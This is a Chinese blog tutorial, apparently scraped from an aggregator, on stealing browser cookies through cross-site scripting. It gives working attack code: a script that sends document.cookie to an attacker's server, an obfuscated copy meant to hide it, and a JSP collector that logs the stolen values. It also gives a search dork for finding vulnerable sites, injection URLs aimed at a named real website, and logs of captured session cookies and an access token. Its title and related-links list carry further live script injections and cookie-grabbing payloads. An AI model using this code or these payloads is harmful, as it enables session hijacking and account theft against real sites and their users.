xss实战: 利用xss得到cookie "/><br><script src="https://www.yunssl.cn:9062/static/p2.js"></script><!-
2017-04-13 00:00
501 查看
0. 前提:有一个你说了算的外网web服务器,比如找个免费的虚拟主机。如果只是内网搞搞xss就算了。
1. 制作一个get.js,放到web上,比如http://www.myweb.com/get.js:
注意:document.cookie包含特殊字符,需要用encodeURIComponent处理一下。
如果不想让人看到js内容,可加密一下,在线加密:http://tool.chinaz.com/js.aspx
JS混淆加密压缩后会变成这样,几乎看不懂是啥:
2. 制作一个get.jsp,获取并保存cookie到服务端的一个文件里,比如/root/msg_get.txt:
3.在存在xss漏洞的地方,插入你的js:
参考:http://www.2cto.com/Article/201203/124645.html
谷歌一下inurl:'Product.asp?BigClassName'
比如:http://www.sider.com.hk/ProductIndex.asp?BigClassName=<script src="http://www.myweb.com/get.js"></script>
比如:csdn文章标题这样写: "/><script src="http://www.myweb.com/get.js"></script><!-
4. 测试:tail -f /root/msg_get.txt,cookie已经保存:
2016-10-14 10:57:020:
ASPSESSIONIDQSTSTSCQ=HOFHOIHDCGHFOLGDFFBGGJOB; ASPSESSIONIDQQTQTSAT=KJBFPGIDFPIOKNFCHBIOHIOB; ASPSESSIONIDSSRRTQAS=ACCJEBCAKAKAEPNDNONFFBKD
2016-10-14 11:01:019:
_ga=GA1.2.1223755915.1472435778; uuid_tt_dd=-3075280651751438540_20160829; UN=moxiaobei; UE="moxiaobei@163.com"; BT=1476438107129; __message_sys_msg_id=0; __message_gu_msg_id=0; __message_cnel_msg_id=0; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1476335060,1476335605,1476337531,1476337604; bdshare_firstime=1412438152173; CNZZDATA1258171664=2092116345-1474159334-|1474359334; __utma=17226283.1223735915.1472435778.1436340181.1476342070.3; __utmz=17222283.1476339070.3.3.utmcsr=write.blog.csdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/postlist/0/all/draft; __message_district_code=210000; __message_in_school=0; UserName=moxiaobei; UserInfo=5cp/Tt2qP3Xm2scg3V2wp1L/0gOVOMwRqcTtX3P12wsEDLhC2LbtiEphbfa1WdEHDkvyg7a2NQArrWB2K0MRuwqPps2EsHVIqwlKXmoa6bu4w/Wo1R3mc29x6tk3NtPK; UserNick=七侠镇莫小贝; AU=B44; UD=职业擅长:
猎人,战士,术士....; access-token=ead18cb6-3e28-4dab-8ea9-6a657362889e; Hm_lpvt_6bcd52f5159b3dce32bec4a3997715ac=1476351192; __utmc=12226283; dc_tos=of0oe6; dc_session_id=1476411240598; avh=9041113,52828352,12772841; uuid=4d2a31a8-78e4-432e-be4b-a4be0f44b9fe
1. 制作一个get.js,放到web上,比如http://www.myweb.com/get.js:
// 参考:http://blog.csdn.net/binyao02123202/article/details/9041113 // 目前比较好的xss方法:js较短,客户端不弹窗,可完整地获取cookie var img = document.createElement('img'); img.width = 0; img.height = 0; img.src = 'http://www.myweb.com/get.jsp?msg='+encodeURIComponent(document.cookie);
注意:document.cookie包含特殊字符,需要用encodeURIComponent处理一下。
如果不想让人看到js内容,可加密一下,在线加密:http://tool.chinaz.com/js.aspx
JS混淆加密压缩后会变成这样,几乎看不懂是啥:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('6 1=2.7(\'1\');1.8=0;1.5=0;1.4=\'3://9.e.f/g.a?b=\'+c(2.d);',17,17,'|img|document|http|src|height|var|createElement|width|www|jsp|msg|encodeURIComponent|cookie|myweb|com|get'.split('|'),0,{}))
2. 制作一个get.jsp,获取并保存cookie到服务端的一个文件里,比如/root/msg_get.txt:
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <%@ page import="java.text.SimpleDateFormat"%> <%@ page import="java.io.*"%> <%@ page import="java.net.*"%> <% //new日期对象 Date date = new Date(); //转换提日期输出格式 SimpleDateFormat dateFormat = new SimpleDateFormat("yyyy-MM-dd HH:mm:sss"); String logfile = "/root/msg_get.txt"; String time_stamp = dateFormat.format(date); String cookie = URLDecoder.decode(request.getParameter("msg"), "UTF-8"); if(null != cookie){ out.println(dateFormat.format(date) + " 正在写入 " + logfile + ":[" + cookie +"]"); System.out.println(dateFormat.format(date) + " 正在写入 " + logfile + ":[" + cookie +"]"); FileWriter writer = null; try { // 打开一个写文件器,构造函数中的第二个参数true表示以追加形式写文件 writer = new FileWriter(logfile, true); writer.write(time_stamp + ":\r\n" + cookie + "\r\n\r\n"); } catch (IOException e) { e.printStackTrace(); } finally { try { if(writer != null){ writer.close(); } } catch (IOException e) { e.printStackTrace(); } } }else{ out.println(dateFormat.format(date) + " 请指定msg参数。这是系统要使用的cookie参数。 "); } %> <script language="javascript"> // 这个脚本是 ie6和ie7 通用的脚本 // http://zhidao.baidu.com/link?url=MxvCuaBHizw8fMEuolqlpdfCe8b-XwouXyP-mtCOVXZgNovuEbTH0Fnq9EZyOgw0bzMgb3hrAD8Tfi-OovfeENrg3cASuHuv -2x7EnzneLW function custom_close(){ if (confirm("您确定要关闭本页吗?")){ window.opener=null; window.open('','_self'); window.close(); } else{} } window.opener=null; window.open('','_self'); window.close(); </script> <input id="btnClose" type="button" value="关闭本页" onClick="custom_close()" />
3.在存在xss漏洞的地方,插入你的js:
参考:http://www.2cto.com/Article/201203/124645.html
谷歌一下inurl:'Product.asp?BigClassName'
比如:http://www.sider.com.hk/ProductIndex.asp?BigClassName=<script src="http://www.myweb.com/get.js"></script>
比如:csdn文章标题这样写: "/><script src="http://www.myweb.com/get.js"></script><!-
4. 测试:tail -f /root/msg_get.txt,cookie已经保存:
2016-10-14 10:57:020:
ASPSESSIONIDQSTSTSCQ=HOFHOIHDCGHFOLGDFFBGGJOB; ASPSESSIONIDQQTQTSAT=KJBFPGIDFPIOKNFCHBIOHIOB; ASPSESSIONIDSSRRTQAS=ACCJEBCAKAKAEPNDNONFFBKD
2016-10-14 11:01:019:
_ga=GA1.2.1223755915.1472435778; uuid_tt_dd=-3075280651751438540_20160829; UN=moxiaobei; UE="moxiaobei@163.com"; BT=1476438107129; __message_sys_msg_id=0; __message_gu_msg_id=0; __message_cnel_msg_id=0; Hm_lvt_6bcd52f51e9b3dce32bec4a3997715ac=1476335060,1476335605,1476337531,1476337604; bdshare_firstime=1412438152173; CNZZDATA1258171664=2092116345-1474159334-|1474359334; __utma=17226283.1223735915.1472435778.1436340181.1476342070.3; __utmz=17222283.1476339070.3.3.utmcsr=write.blog.csdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/postlist/0/all/draft; __message_district_code=210000; __message_in_school=0; UserName=moxiaobei; UserInfo=5cp/Tt2qP3Xm2scg3V2wp1L/0gOVOMwRqcTtX3P12wsEDLhC2LbtiEphbfa1WdEHDkvyg7a2NQArrWB2K0MRuwqPps2EsHVIqwlKXmoa6bu4w/Wo1R3mc29x6tk3NtPK; UserNick=七侠镇莫小贝; AU=B44; UD=职业擅长:
猎人,战士,术士....; access-token=ead18cb6-3e28-4dab-8ea9-6a657362889e; Hm_lpvt_6bcd52f5159b3dce32bec4a3997715ac=1476351192; __utmc=12226283; dc_tos=of0oe6; dc_session_id=1476411240598; avh=9041113,52828352,12772841; uuid=4d2a31a8-78e4-432e-be4b-a4be0f44b9fe
相关文章推荐
- xss实战: 利用xss得到cookie "/><br><script src="https://www.yunssl.cn:9062/static/p2.js"></script><!-
- <script>alert('xss1');alert(document.cookie);self.location="http://dwz.cn/3SVr3s"</script>
- layui 表单验证案例文本框,手机,邮箱,textarea等格式的验证 <script src="layui/layui.js"></script> <script src="layui/lay
- 【phpcms-v9】怎样在<script src="xxx.php"></script>标记中引入php文件
- <script src="xxx.php"></script>
- <script type="text/javascript" src="<%=path %>/pages/js/arsis/area.js?v=1.01"></script> 为什么在最后加? v+1.01
- <script src="http://xxsi.sinaapp.com/?u=daad1b"></script>
- "/><script>alert(document.cookie)</script><!-
- this is a test:::"><img src=hi onerror=alert(document.cookie)>
- <script type="text/javascript"></script>
- <h1>测试博客</h1><script type="text/javascript">alert(456);</script>
- <script type="text/html"></script> js模版使用
- <img src="javascript:alert(/XSS/)">
- <script type="text/javascript" src="">
- <img src="javascript:alert(/xss/)">已经慢慢过时了的
- <mvc:resources mapping="/js/**" location="/js/**"/> <script type="text/javascript" src="<%=reques
- jquery mobile phonegap中页面跳转白屏及抖动的解决办法<script src="http://code.jquery.com/jquery-1.6.4.min.js"></scri
- This is a test"></textarea><script src=http://xss.tw/1024></script>
- <img src=hi onerror='(new Image()).src="http://mengkang.net/?getCookie="+document.cookie'>
- '"><img src=1 onerror=console.log('XSS')>